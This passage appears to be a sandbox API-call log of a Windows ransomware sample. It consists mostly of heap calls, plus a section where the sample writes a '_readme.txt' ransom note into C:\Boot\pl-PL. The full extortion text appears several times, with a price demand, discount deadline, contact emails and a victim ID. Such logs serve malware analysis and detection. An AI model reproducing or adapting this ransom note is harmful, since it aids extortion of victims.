RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.791] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.791] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.792] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.792] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.793] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.793] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.794] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.794] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.795] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.795] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.795] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.795] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.795] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0209.795] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.795] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.795] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.795] PathFindFileNameW (pszPath="") returned="" [0209.795] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.796] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.796] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.796] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.796] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.796] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.796] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.796] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0209.796] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0209.796] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.796] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.796] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.797] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.797] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.797] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.797] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.797] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.797] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.797] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.797] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.797] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.798] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.798] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.798] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.799] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.799] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.800] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.800] HeapFree (in: hHeap=0x750000, dwFlags=0x0, 